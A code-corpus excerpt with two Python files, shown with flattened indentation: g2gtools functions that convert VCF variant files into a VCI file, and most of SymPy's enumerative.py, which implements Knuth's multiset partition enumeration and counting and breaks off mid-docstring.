def create_vci_header(temp_directory, fasta_file, vcf_input_files, output_file, strain, vcf_keep, passed, quality, diploid, num_processes, bgzip):
file = g2g_utils.gen_file_name("header", output_dir=temp_directory, extension='', append_time=False)
with open(file, "w") as fd:
fd.write("##CREATION_TIME={}\n".format(time.strftime("%m/%d/%Y %H:%M:%S")))
for vcf_file in vcf_input_files:
fd.write("##INPUT_VCF={}\n".format(vcf_file.file_name))
fd.write("##FASTA_FILE={}\n".format(fasta_file))
fd.write("##STRAIN={}\n".format(strain))
fd.write("##VCF_KEEP={}\n".format(vcf_keep))
fd.write("##FILTER_PASSED={}\n".format(passed))
fd.write("##FILTER_QUALITY={}\n".format(quality))
fd.write("##DIPLOID={}\n".format(diploid))
fd.write("##PROCESSES={}\n".format(num_processes))
fasta_file = fasta.FastaFile(fasta_file)
for c in fasta_file.references:
fd.write("##CONTIG={}:{}\n".format(c, fasta_file.get_reference_length(c)))
fd.write("#CHROM\tPOS\tANCHOR\tINS\tDEL\tFRAG\n")
return file
def process(vcf_files, fasta_file, output_file, strain, vcf_keep=False, passed=False, quality=False, diploid=False, num_processes=None, bgzip=False):
start = time.time()
output_file = g2g_utils.check_file(output_file, 'w')
output_file_dir = os.path.dirname(output_file)
vcf_file_inputs = []
if vcf_files:
for file_name in vcf_files:
vcf_file = g2g_utils.check_file(file_name)
LOG.info("VCF file: {0}".format(vcf_file))
LOG.info("Checking for index file, creating if needed...")
g2g_utils.index_file(original_file=vcf_file, file_format="vcf", overwrite=False)
vcf_discard_file = None
if vcf_keep:
vcf_discard_file = "{0}.errors.vcf".format(os.path.basename(output_file))
vcf_discard_file = os.path.join(output_file_dir, vcf_discard_file)
LOG.info("VCF indel discard file: {0}".format(vcf_discard_file))
vcf_file_inputs.append(VCFFileInformation(vcf_file, vcf_discard_file))
if len(vcf_file_inputs) == 0:
raise exceptions.G2GValueError("No VCF files.")
if not fasta_file:
raise exceptions.G2GValueError("No fasta file was specified.")
if not strain:
raise exceptions.G2GValueError("No strain was specified.")
if not num_processes:
num_processes = multiprocessing.cpu_count()
else:
if num_processes <= 0:
num_processes = 1
LOG.info("Fasta File: {0}".format(output_file))
LOG.info("Strain: {0}".format(strain))
LOG.info("Pass filter on: {0}".format(str(passed)))
LOG.info("Quality filter on: {0}".format(str(quality)))
LOG.info("Diploid: {0}".format(str(diploid)))
LOG.info("Number of processes: {0}".format(num_processes))
LOG.info("Output VCI File: {0}".format(output_file))
# not all chromosomes/seqid will be processed if not in vcf file
processed_seq_ids = {}
temp_directory = g2g_utils.create_temp_dir('vcf2vci', dir='.')
LOG.debug("Temp directory: {}".format(temp_directory))
header_file = create_vci_header(temp_directory, fasta_file, vcf_file_inputs, output_file, strain, vcf_keep, passed, quality, diploid, num_processes, bgzip)
for i, vcf_file in enumerate(vcf_file_inputs):
tb_file = pysam.TabixFile(vcf_file.file_name)
for h in tb_file.header:
h = g2g_utils.s(h)
if h[:6] == '#CHROM':
try:
elems = h.split('\t')
samples = elems[9:]
samples = dict(zip(samples, (x for x in xrange(len(samples)))))
vcf_file_inputs[i].sample_index = samples[strain]
except KeyError as ke:
raise exceptions.G2GVCFError("Unknown strain '{0}', valid strains are: {1}".format(strain, ", ".join(samples)))
for seq_id in tb_file.contigs:
processed_seq_ids[seq_id] = False
tmp_processed_seq_ids = OrderedDict()
for k in g2g_utils.natsorted(processed_seq_ids.keys()):
tmp_processed_seq_ids[k] = False
processed_seq_ids = tmp_processed_seq_ids
all_merge_info = []
try:
for c in processed_seq_ids:
merge_info = VCF2VCIInfo()
merge_info.chromosome = c
merge_info.vcf_files = vcf_file_inputs
merge_info.fasta_file = fasta_file
merge_info.diploid = diploid
merge_info.passed = passed
merge_info.quality = quality
merge_info.vcf_keep = vcf_keep
if diploid:
merge_info.output_file_left = g2g_utils.gen_file_name("chr{}.left".format(c), output_dir=temp_directory, extension='vci', append_time=False)
merge_info.output_file_right = g2g_utils.gen_file_name("chr{}.right".format(c), output_dir=temp_directory, extension='vci', append_time=False)
g2g_utils.delete_file(merge_info.output_file_left)
g2g_utils.delete_file(merge_info.output_file_right)
else:
merge_info.output_file_left = g2g_utils.gen_file_name("chr{}.right".format(c), output_dir=temp_directory, extension='vci', append_time=False)
g2g_utils.delete_file(merge_info.output_file_left)
all_merge_info.append(merge_info)
LOG.info("Parsing VCF files...")
args = zip(all_merge_info)
pool = multiprocessing.Pool(num_processes)
results = pool.map(wrapper, args)
# parse results
total = 0
for r in results:
total += r['line_numbers']
# show stats
#TODO: make sure stats are good and show statistics
LOG.debug("Combining temp files...")
LOG.info("Finalizing VCI file...")
files = [header_file]
if diploid:
for mi in all_merge_info:
files.append(mi.output_file_left)
files.append(mi.output_file_right)
g2g_utils.concatenate_files(files, output_file, True)
if bgzip:
g2g_utils.bgzip_and_index_file(output_file, output_file + ".gz", delete_original=True, file_format="vcf")
else:
for mi in all_merge_info:
files.append(mi.output_file_left)
g2g_utils.concatenate_files(files, output_file, True)
if bgzip:
g2g_utils.bgzip_and_index_file(output_file, output_file + ".gz", delete_original=True, file_format="vcf")
# if vcf_keep:
# vcf_discard_file.close()
# TODO: make sure stats are good and show statistics
LOG.info("Parsed {0:,} total lines".format(total))
except exceptions.KeyboardInterruptError:
pool.terminate()
raise exceptions.G2GError("Keyboard quit consumed")
except KeyboardInterrupt:
pool.terminate()
raise exceptions.G2GError("Execution halted")
except Exception as e:
g2g_utils._show_error()
raise exceptions.G2GError("Execution halted unknown error")
finally:
g2g_utils.delete_dir(temp_directory)
LOG.info("VCI creation complete: {0}".format(g2g_utils.format_time(start, time.time())))
|
churchill-lab/g2gtools
|
g2gtools/vcf2vci.py
|
Python
|
mit
| 22,155
|
[
"pysam"
] |
510349f8b539c3fd853bae634c1c4aaf9b5369e93f836ee03312c8fea95de3e1
|
from __future__ import print_function, division
from sympy.core.compatibility import range
"""
Algorithms and classes to support enumerative combinatorics.
Currently just multiset partitions, but more could be added.
Terminology (following Knuth, algorithm 7.1.2.5M TAOCP)
*multiset* aaabbcccc has a *partition* aaabc | bccc
The submultisets, aaabc and bccc of the partition are called
*parts*, or sometimes *vectors*. (Knuth notes that multiset
partitions can be thought of as partitions of vectors of integers,
where the ith element of the vector gives the multiplicity of
element i.)
The values a, b and c are *components* of the multiset. These
correspond to elements of a set, but in a multiset can be present
with a multiplicity greater than 1.
The algorithm deserves some explanation.
Think of the part aaabc from the multiset above. If we impose an
ordering on the components of the multiset, we can represent a part
with a vector, in which the value of the first element of the vector
corresponds to the multiplicity of the first component in that
part. Thus, aaabc can be represented by the vector [3, 1, 1]. We
can also define an ordering on parts, based on the lexicographic
ordering of the vector (leftmost vector element, i.e., the element
with the smallest component number, is the most significant), so
that [3, 1, 1] > [3, 1, 0] and [3, 1, 1] > [2, 1, 4]. The ordering
on parts can be extended to an ordering on partitions: First, sort
the parts in each partition, left-to-right in decreasing order. Then
partition A is greater than partition B if A's leftmost/greatest
part is greater than B's leftmost part. If the leftmost parts are
equal, compare the second parts, and so on.
In this ordering, the greatest partition of a given multiset has only
one part. The least partition is the one in which the components
are spread out, one per part.
The enumeration algorithms in this file yield the partitions of the
argument multiset in decreasing order. The main data structure is a
stack of parts, corresponding to the current partition. An
important invariant is that the parts on the stack are themselves in
decreasing order. This data structure is decremented to find the
next smaller partition. Most often, decrementing the partition will
only involve adjustments to the smallest parts at the top of the
stack, much as adjacent integers *usually* differ only in their last
few digits.
Knuth's algorithm uses two main operations on parts:
Decrement - change the part so that it is smaller in the
(vector) lexicographic order, but reduced by the smallest amount possible.
For example, if the multiset has vector [5,
3, 1], and the bottom/greatest part is [4, 2, 1], this part would
decrement to [4, 2, 0], while [4, 0, 0] would decrement to [3, 3,
1]. A singleton part is never decremented -- [1, 0, 0] is not
decremented to [0, 3, 1]. Instead, the decrement operator needs
to fail for this case. In Knuth's pseudocode, the decrement
operator is step m5.
Spread unallocated multiplicity - Once a part has been decremented,
it cannot be the rightmost part in the partition. There is some
multiplicity that has not been allocated, and new parts must be
created above it in the stack to use up this multiplicity. To
maintain the invariant that the parts on the stack are in
decreasing order, these new parts must be less than or equal to
the decremented part.
For example, if the multiset is [5, 3, 1], and its most
significant part has just been decremented to [5, 3, 0], the
spread operation will add a new part so that the stack becomes
[[5, 3, 0], [0, 0, 1]]. If the most significant part (for the
same multiset) has been decremented to [2, 0, 0] the stack becomes
[[2, 0, 0], [2, 0, 0], [1, 3, 1]]. In the pseudocode, the spread
operation for one part is step m2. The complete spread operation
is a loop of steps m2 and m3.
In order to facilitate the spread operation, Knuth stores, for each
component of each part, not just the multiplicity of that component
in the part, but also the total multiplicity available for this
component in this part or any lesser part above it on the stack.
One added twist is that Knuth does not represent the part vectors as
arrays. Instead, he uses a sparse representation, in which a
component of a part is represented as a component number (c), plus
the multiplicity of the component in that part (v) as well as the
total multiplicity available for that component (u). This saves
time that would be spent skipping over zeros.
"""
class PartComponent(object):
"""Internal class used in support of the multiset partitions
enumerators and the associated visitor functions.
Represents one component of one part of the current partition.
A stack of these, plus an auxiliary frame array, f, represents a
partition of the multiset.
Knuth's pseudocode makes c, u, and v separate arrays.
"""
__slots__ = ('c', 'u', 'v')
def __init__(self):
self.c = 0 # Component number
self.u = 0 # The as yet unpartitioned amount in component c
# *before* it is allocated by this triple
self.v = 0 # Amount of c component in the current part
# (v<=u). An invariant of the representation is
# that the next higher triple for this component
# (if there is one) will have a value of u-v in
# its u attribute.
def __repr__(self):
"for debug/algorithm animation purposes"
return 'c:%d u:%d v:%d' % (self.c, self.u, self.v)
def __eq__(self, other):
"""Define value oriented equality, which is useful for testers"""
return (isinstance(other, self.__class__) and
self.c == other.c and
self.u == other.u and
self.v == other.v)
def __ne__(self, other):
"""Defined for consistency with __eq__"""
return not self == other
# This function tries to be a faithful implementation of algorithm
# 7.1.2.5M in Volume 4A, Combinatoral Algorithms, Part 1, of The Art
# of Computer Programming, by Donald Knuth. This includes using
# (mostly) the same variable names, etc. This makes for rather
# low-level Python.
# Changes from Knuth's pseudocode include
# - use PartComponent struct/object instead of 3 arrays
# - make the function a generator
# - map (with some difficulty) the GOTOs to Python control structures.
# - Knuth uses 1-based numbering for components, this code is 0-based
# - renamed variable l to lpart.
# - flag variable x takes on values True/False instead of 1/0
#
def multiset_partitions_taocp(multiplicities):
"""Enumerates partitions of a multiset.
Parameters
==========
multiplicities
list of integer multiplicities of the components of the multiset.
Yields
======
state
Internal data structure which encodes a particular partition.
This output is then usually processed by a vistor function
which combines the information from this data structure with
the components themselves to produce an actual partition.
Unless they wish to create their own visitor function, users will
have little need to look inside this data structure. But, for
reference, it is a 3-element list with components:
f
is a frame array, which is used to divide pstack into parts.
lpart
points to the base of the topmost part.
pstack
is an array of PartComponent objects.
The ``state`` output offers a peek into the internal data
structures of the enumeration function. The client should
treat this as read-only; any modification of the data
structure will cause unpredictable (and almost certainly
incorrect) results. Also, the components of ``state`` are
modified in place at each iteration. Hence, the visitor must
be called at each loop iteration. Accumulating the ``state``
instances and processing them later will not work.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> # variables components and multiplicities represent the multiset 'abb'
>>> components = 'ab'
>>> multiplicities = [1, 2]
>>> states = multiset_partitions_taocp(multiplicities)
>>> list(list_visitor(state, components) for state in states)
[[['a', 'b', 'b']],
[['a', 'b'], ['b']],
[['a'], ['b', 'b']],
[['a'], ['b'], ['b']]]
See Also
========
sympy.utilities.iterables.multiset_partitions: Takes a multiset
as input and directly yields multiset partitions. It
dispatches to a number of functions, including this one, for
implementation. Most users will find it more convenient to
use than multiset_partitions_taocp.
"""
# Important variables.
# m is the number of components, i.e., number of distinct elements
m = len(multiplicities)
# n is the cardinality, total number of elements whether or not distinct
n = sum(multiplicities)
# The main data structure, f segments pstack into parts. See
# list_visitor() for example code indicating how this internal
# state corresponds to a partition.
# Note: allocation of space for stack is conservative. Knuth's
# exercise 7.2.1.5.68 gives some indication of how to tighten this
# bound, but this is not implemented.
pstack = [PartComponent() for i in range(n * m + 1)]
f = [0] * (n + 1)
# Step M1 in Knuth (Initialize)
# Initial state - entire multiset in one part.
for j in range(m):
ps = pstack[j]
ps.c = j
ps.u = multiplicities[j]
ps.v = multiplicities[j]
# Other variables
f[0] = 0
a = 0
lpart = 0
f[1] = m
b = m # in general, current stack frame is from a to b - 1
while True:
while True:
# Step M2 (Subtract v from u)
j = a
k = b
x = False
while j < b:
pstack[k].u = pstack[j].u - pstack[j].v
if pstack[k].u == 0:
x = True
elif not x:
pstack[k].c = pstack[j].c
pstack[k].v = min(pstack[j].v, pstack[k].u)
x = pstack[k].u < pstack[j].v
k = k + 1
else: # x is True
pstack[k].c = pstack[j].c
pstack[k].v = pstack[k].u
k = k + 1
j = j + 1
# Note: x is True iff v has changed
# Step M3 (Push if nonzero.)
if k > b:
a = b
b = k
lpart = lpart + 1
f[lpart + 1] = b
# Return to M2
else:
break # Continue to M4
# M4 Visit a partition
state = [f, lpart, pstack]
yield state
# M5 (Decrease v)
while True:
j = b-1
while (pstack[j].v == 0):
j = j - 1
if j == a and pstack[j].v == 1:
# M6 (Backtrack)
if lpart == 0:
return
lpart = lpart - 1
b = a
a = f[lpart]
# Return to M5
else:
pstack[j].v = pstack[j].v - 1
for k in range(j + 1, b):
pstack[k].v = pstack[k].u
break # GOTO M2
# --------------- Visitor functions for multiset partitions ---------------
# A visitor takes the partition state generated by
# multiset_partitions_taocp or other enumerator, and produces useful
# output (such as the actual partition).
def factoring_visitor(state, primes):
"""Use with multiset_partitions_taocp to enumerate the ways a
number can be expressed as a product of factors. For this usage,
the exponents of the prime factors of a number are arguments to
the partition enumerator, while the corresponding prime factors
are input here.
Examples
========
To enumerate the factorings of a number we can think of the elements of the
partition as being the prime factors and the multiplicities as being their
exponents.
>>> from sympy.utilities.enumerative import factoring_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> from sympy import factorint
>>> primes, multiplicities = zip(*factorint(24).items())
>>> primes
(2, 3)
>>> multiplicities
(3, 1)
>>> states = multiset_partitions_taocp(multiplicities)
>>> list(factoring_visitor(state, primes) for state in states)
[[24], [8, 3], [12, 2], [4, 6], [4, 2, 3], [6, 2, 2], [2, 2, 2, 3]]
"""
f, lpart, pstack = state
factoring = []
for i in range(lpart + 1):
factor = 1
for ps in pstack[f[i]: f[i + 1]]:
if ps.v > 0:
factor *= primes[ps.c] ** ps.v
factoring.append(factor)
return factoring
def list_visitor(state, components):
"""Return a list of lists to represent the partition.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import multiset_partitions_taocp
>>> states = multiset_partitions_taocp([1, 2, 1])
>>> s = next(states)
>>> list_visitor(s, 'abc') # for multiset 'a b b c'
[['a', 'b', 'b', 'c']]
>>> s = next(states)
>>> list_visitor(s, [1, 2, 3]) # for multiset '1 2 2 3
[[1, 2, 2], [3]]
"""
f, lpart, pstack = state
partition = []
for i in range(lpart+1):
part = []
for ps in pstack[f[i]:f[i+1]]:
if ps.v > 0:
part.extend([components[ps.c]] * ps.v)
partition.append(part)
return partition
class MultisetPartitionTraverser():
"""
Has methods to ``enumerate`` and ``count`` the partitions of a multiset.
This implements a refactored and extended version of Knuth's algorithm
7.1.2.5M [AOCP]_."
The enumeration methods of this class are generators and return
data structures which can be interpreted by the same visitor
functions used for the output of ``multiset_partitions_taocp``.
See Also
========
multiset_partitions_taocp
sympy.utilities.iterables.multiset_partititions
Examples
========
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> m.count_partitions([4,4,4,2])
127750
>>> m.count_partitions([3,3,3])
686
References
==========
.. [AOCP] Algorithm 7.1.2.5M in Volume 4A, Combinatoral Algorithms,
Part 1, of The Art of Computer Programming, by Donald Knuth.
.. [Factorisatio] On a Problem of Oppenheim concerning
"Factorisatio Numerorum" E. R. Canfield, Paul Erdos, Carl
Pomerance, JOURNAL OF NUMBER THEORY, Vol. 17, No. 1. August
1983. See section 7 for a description of an algorithm
similar to Knuth's.
.. [Yorgey] Generating Multiset Partitions, Brent Yorgey, The
Monad.Reader, Issue 8, September 2007.
"""
def __init__(self):
self.debug = False
# TRACING variables. These are useful for gathering
# statistics on the algorithm itself, but have no particular
# benefit to a user of the code.
self.k1 = 0
self.k2 = 0
self.p1 = 0
def db_trace(self, msg):
"""Useful for usderstanding/debugging the algorithms. Not
generally activated in end-user code."""
if self.debug:
letters = 'abcdefghijklmnopqrstuvwxyz'
state = [self.f, self.lpart, self.pstack]
print("DBG:", msg,
["".join(part) for part in list_visitor(state, letters)],
animation_visitor(state))
#
# Helper methods for enumeration
#
def _initialize_enumeration(self, multiplicities):
"""Allocates and initializes the partition stack.
This is called from the enumeration/counting routines, so
there is no need to call it separately."""
num_components = len(multiplicities)
# cardinality is the total number of elements, whether or not distinct
cardinality = sum(multiplicities)
# pstack is the partition stack, which is segmented by
# f into parts.
self.pstack = [PartComponent() for i in
range(num_components * cardinality + 1)]
self.f = [0] * (cardinality + 1)
# Initial state - entire multiset in one part.
for j in range(num_components):
ps = self.pstack[j]
ps.c = j
ps.u = multiplicities[j]
ps.v = multiplicities[j]
self.f[0] = 0
self.f[1] = num_components
self.lpart = 0
# The decrement_part() method corresponds to step M5 in Knuth's
# algorithm. This is the base version for enum_all(). Modified
# versions of this method are needed if we want to restrict
# sizes of the partitions produced.
def decrement_part(self, part):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
If you think of the v values in the part as a multi-digit
integer (least significant digit on the right) this is
basically decrementing that integer, but with the extra
constraint that the leftmost digit cannot be decremented to 0.
Parameters
==========
part
The part, represented as a list of PartComponent objects,
which is to be decremented.
"""
plen = len(part)
for j in range(plen - 1, -1, -1):
if (j == 0 and part[j].v > 1) or (j > 0 and part[j].v > 0):
# found val to decrement
part[j].v -= 1
# Reset trailing parts back to maximum
for k in range(j + 1, plen):
part[k].v = part[k].u
return True
return False
# Version to allow number of parts to be bounded from above.
# Corresponds to (a modified) step M5.
def decrement_part_small(self, part, ub):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
ub
the maximum number of parts allowed in a partition
returned by the calling traversal.
Notes
=====
The goal of this modification of the ordinary decrement method
is to fail (meaning that the subtree rooted at this part is to
be skipped) when it can be proved that this part can only have
child partitions which are larger than allowed by ``ub``. If a
decision is made to fail, it must be accurate, otherwise the
enumeration will miss some partitions. But, it is OK not to
capture all the possible failures -- if a part is passed that
shouldn't be, the resulting too-large partitions are filtered
by the enumeration one level up. However, as is usual in
constrained enumerations, failing early is advantageous.
The tests used by this method catch the most common cases,
although this implementation is by no means the last word on
this problem. The tests include:
1) ``lpart`` must be less than ``ub`` by at least 2. This is because
once a part has been decremented, the partition
will gain at least one child in the spread step.
2) If the leading component of the part is about to be
decremented, check for how many parts will be added in
order to use up the unallocated multiplicity in that
leading component, and fail if this number is greater than
allowed by ``ub``. (See code for the exact expression.) This
test is given in the answer to Knuth's problem 7.2.1.5.69.
3) If there is *exactly* enough room to expand the leading
component by the above test, check the next component (if
it exists) once decrementing has finished. If this has
``v == 0``, this next component will push the expansion over the
limit by 1, so fail.
"""
if self.lpart >= ub - 1:
self.p1 += 1 # increment to keep track of usefulness of tests
return False
plen = len(part)
for j in range(plen - 1, -1, -1):
# Knuth's mod, (answer to problem 7.2.1.5.69)
if (j == 0) and (part[0].v - 1)*(ub - self.lpart) < part[0].u:
self.k1 += 1
return False
if (j == 0 and part[j].v > 1) or (j > 0 and part[j].v > 0):
# found val to decrement
part[j].v -= 1
# Reset trailing parts back to maximum
for k in range(j + 1, plen):
part[k].v = part[k].u
# Have now decremented part, but are we doomed to
# failure when it is expanded? Check one oddball case
# that turns out to be surprisingly common - exactly
# enough room to expand the leading component, but no
# room for the second component, which has v=0.
if (plen > 1 and (part[1].v == 0) and
(part[0].u - part[0].v) ==
((ub - self.lpart - 1) * part[0].v)):
self.k2 += 1
self.db_trace("Decrement fails test 3")
return False
return True
return False
def decrement_part_large(self, part, amt, lb):
"""Decrements part, while respecting size constraint.
A part can have no children which are of sufficient size (as
indicated by ``lb``) unless that part has sufficient
unallocated multiplicity. When enforcing the size constraint,
this method will decrement the part (if necessary) by an
amount needed to ensure sufficient unallocated multiplicity.
Returns True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
amt
Can only take values 0 or 1. A value of 1 means that the
part must be decremented, and then the size constraint is
enforced. A value of 0 means just to enforce the ``lb``
size constraint.
lb
The partitions produced by the calling enumeration must
have more parts than this value.
"""
if amt == 1:
# In this case we always need to increment, *before*
# enforcing the "sufficient unallocated multiplicity"
# constraint. Easiest for this is just to call the
# regular decrement method.
if not self.decrement_part(part):
return False
# Next, perform any needed additional decrementing to respect
# "sufficient unallocated multiplicity" (or fail if this is
# not possible).
min_unalloc = lb - self.lpart
if min_unalloc <= 0:
return True
total_mult = sum(pc.u for pc in part)
total_alloc = sum(pc.v for pc in part)
if total_mult <= min_unalloc:
return False
deficit = min_unalloc - (total_mult - total_alloc)
if deficit <= 0:
return True
for i in range(len(part) - 1, -1, -1):
if i == 0:
if part[0].v > deficit:
part[0].v -= deficit
return True
else:
return False # This shouldn't happen, due to above check
else:
if part[i].v >= deficit:
part[i].v -= deficit
return True
else:
deficit -= part[i].v
part[i].v = 0
def decrement_part_range(self, part, lb, ub):
"""Decrements part (a subrange of pstack), if possible, returning
True iff the part was successfully decremented.
Parameters
==========
part
part to be decremented (topmost part on the stack)
ub
the maximum number of parts allowed in a partition
returned by the calling traversal.
lb
The partitions produced by the calling enumeration must
have more parts than this value.
Notes
=====
Combines the constraints of _small and _large decrement
methods. If returns success, part has been decremented at
least once, but perhaps by quite a bit more if needed to meet
the lb constraint.
"""
# Constraint in the range case is just enforcing both the
# constraints from _small and _large cases. Note the 0 as the
# second argument to the _large call -- this is the signal to
# decrement only as needed to for constraint enforcement. The
# short circuiting and left-to-right order of the 'and'
# operator is important for this to work correctly.
return self.decrement_part_small(part, ub) and \
self.decrement_part_large(part, 0, lb)
def spread_part_multiplicity(self):
"""Returns True if a new part has been created, and
adjusts pstack, f and lpart as needed.
Notes
=====
Spreads unallocated multiplicity from the current top part
into a new part created above the current on the stack. This
new part is constrained to be less than or equal to the old in
terms of the part ordering.
This call does nothing (and returns False) if the current top
part has no unallocated multiplicity.
"""
j = self.f[self.lpart] # base of current top part
k = self.f[self.lpart + 1] # ub of current; potential base of next
base = k # save for later comparison
changed = False # Set to true when the new part (so far) is
# strictly less than (as opposed to less than
# or equal) to the old.
for j in range(self.f[self.lpart], self.f[self.lpart + 1]):
self.pstack[k].u = self.pstack[j].u - self.pstack[j].v
if self.pstack[k].u == 0:
changed = True
else:
self.pstack[k].c = self.pstack[j].c
if changed: # Put all available multiplicity in this part
self.pstack[k].v = self.pstack[k].u
else: # Still maintaining ordering constraint
if self.pstack[k].u < self.pstack[j].v:
self.pstack[k].v = self.pstack[k].u
changed = True
else:
self.pstack[k].v = self.pstack[j].v
k = k + 1
if k > base:
# Adjust for the new part on stack
self.lpart = self.lpart + 1
self.f[self.lpart + 1] = k
return True
return False
def top_part(self):
"""Return current top part on the stack, as a slice of pstack.
"""
return self.pstack[self.f[self.lpart]:self.f[self.lpart + 1]]
# Same interface and functionality as multiset_partitions_taocp(),
# but some might find this refactored version easier to follow.
def enum_all(self, multiplicities):
"""Enumerate the partitions of a multiset.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_all([2,2])
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b', 'b']],
[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'a'], ['b'], ['b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a', 'b'], ['a'], ['b']],
[['a'], ['a'], ['b', 'b']],
[['a'], ['a'], ['b'], ['b']]]
See also
========
multiset_partitions_taocp():
which provides the same result as this method, but is
about twice as fast. Hence, enum_all is primarily useful
for testing. Also see the function for a discussion of
states and visitors.
"""
self._initialize_enumeration(multiplicities)
while True:
while self.spread_part_multiplicity():
pass
# M4 Visit a partition
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
def enum_small(self, multiplicities, ub):
"""Enumerate multiset partitions with no more than ``ub`` parts.
Equivalent to enum_range(multiplicities, 0, ub)
See also
========
enum_all, enum_large, enum_range
Parameters
==========
multiplicities
list of multiplicities of the components of the multiset.
ub
Maximum number of parts
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_small([2,2], 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b', 'b']],
[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']]]
The implementation is based, in part, on the answer given to
exercise 69, in Knuth [AOCP]_.
"""
# Keep track of iterations which do not yield a partition.
# Clearly, we would like to keep this number small.
self.discarded = 0
if ub <= 0:
return
self._initialize_enumeration(multiplicities)
while True:
good_partition = True
while self.spread_part_multiplicity():
self.db_trace("spread 1")
if self.lpart >= ub:
self.discarded += 1
good_partition = False
self.db_trace(" Discarding")
self.lpart = ub - 2
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_small(self.top_part(), ub):
self.db_trace("Failed decrement, going to backtrack")
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
self.db_trace("Backtracked to")
self.db_trace("decrement ok, about to expand")
def enum_large(self, multiplicities, lb):
"""Enumerate the partitions of a multiset with lb < num(parts)
Equivalent to enum_range(multiplicities, lb, sum(multiplicities))
See also
========
enum_all, enum_small, enum_range
Parameters
==========
multiplicities
list of multiplicities of the components of the multiset.
lb
Number of parts in the partition must be greater than
this lower bound.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_large([2,2], 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a'], ['b'], ['b']],
[['a', 'b'], ['a'], ['b']],
[['a'], ['a'], ['b', 'b']],
[['a'], ['a'], ['b'], ['b']]]
"""
self.discarded = 0
if lb >= sum(multiplicities):
return
self._initialize_enumeration(multiplicities)
self.decrement_part_large(self.top_part(), 0, lb)
while True:
good_partition = True
while self.spread_part_multiplicity():
if not self.decrement_part_large(self.top_part(), 0, lb):
# Failure here should be rare/impossible
self.discarded += 1
good_partition = False
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_large(self.top_part(), 1, lb):
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
def enum_range(self, multiplicities, lb, ub):
"""Enumerate the partitions of a multiset with
``lb < num(parts) <= ub``.
In particular, if partitions with exactly ``k`` parts are
desired, call with ``(multiplicities, k - 1, k)``. This
method generalizes enum_all, enum_small, and enum_large.
Examples
========
>>> from sympy.utilities.enumerative import list_visitor
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> states = m.enum_range([2,2], 1, 2)
>>> list(list_visitor(state, 'ab') for state in states)
[[['a', 'a', 'b'], ['b']],
[['a', 'a'], ['b', 'b']],
[['a', 'b', 'b'], ['a']],
[['a', 'b'], ['a', 'b']]]
"""
# combine the constraints of the _large and _small
# enumerations.
self.discarded = 0
if ub <= 0 or lb >= sum(multiplicities):
return
self._initialize_enumeration(multiplicities)
self.decrement_part_large(self.top_part(), 0, lb)
while True:
good_partition = True
while self.spread_part_multiplicity():
self.db_trace("spread 1")
if not self.decrement_part_large(self.top_part(), 0, lb):
# Failure here - possible in range case?
self.db_trace(" Discarding (large cons)")
self.discarded += 1
good_partition = False
break
elif self.lpart >= ub:
self.discarded += 1
good_partition = False
self.db_trace(" Discarding small cons")
self.lpart = ub - 2
break
# M4 Visit a partition
if good_partition:
state = [self.f, self.lpart, self.pstack]
yield state
# M5 (Decrease v)
while not self.decrement_part_range(self.top_part(), lb, ub):
self.db_trace("Failed decrement, going to backtrack")
# M6 (Backtrack)
if self.lpart == 0:
return
self.lpart -= 1
self.db_trace("Backtracked to")
self.db_trace("decrement ok, about to expand")
def count_partitions_slow(self, multiplicities):
"""Returns the number of partitions of a multiset whose elements
have the multiplicities given in ``multiplicities``.
Primarily for comparison purposes. It follows the same path as
enumerate, and counts, rather than generates, the partitions.
See Also
========
count_partitions
Has the same calling interface, but is much faster.
"""
# number of partitions so far in the enumeration
self.pcount = 0
self._initialize_enumeration(multiplicities)
while True:
while self.spread_part_multiplicity():
pass
# M4 Visit (count) a partition
self.pcount += 1
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
if self.lpart == 0:
return self.pcount
self.lpart -= 1
def count_partitions(self, multiplicities):
"""Returns the number of partitions of a multiset whose components
have the multiplicities given in ``multiplicities``.
For larger counts, this method is much faster than calling one
of the enumerators and counting the result. Uses dynamic
programming to cut down on the number of nodes actually
explored. The dictionary used in order to accelerate the
counting process is stored in the ``MultisetPartitionTraverser``
object and persists across calls. If the user does not
expect to call ``count_partitions`` for any additional
multisets, the object should be cleared to save memory. On
the other hand, the cache built up from one count run can
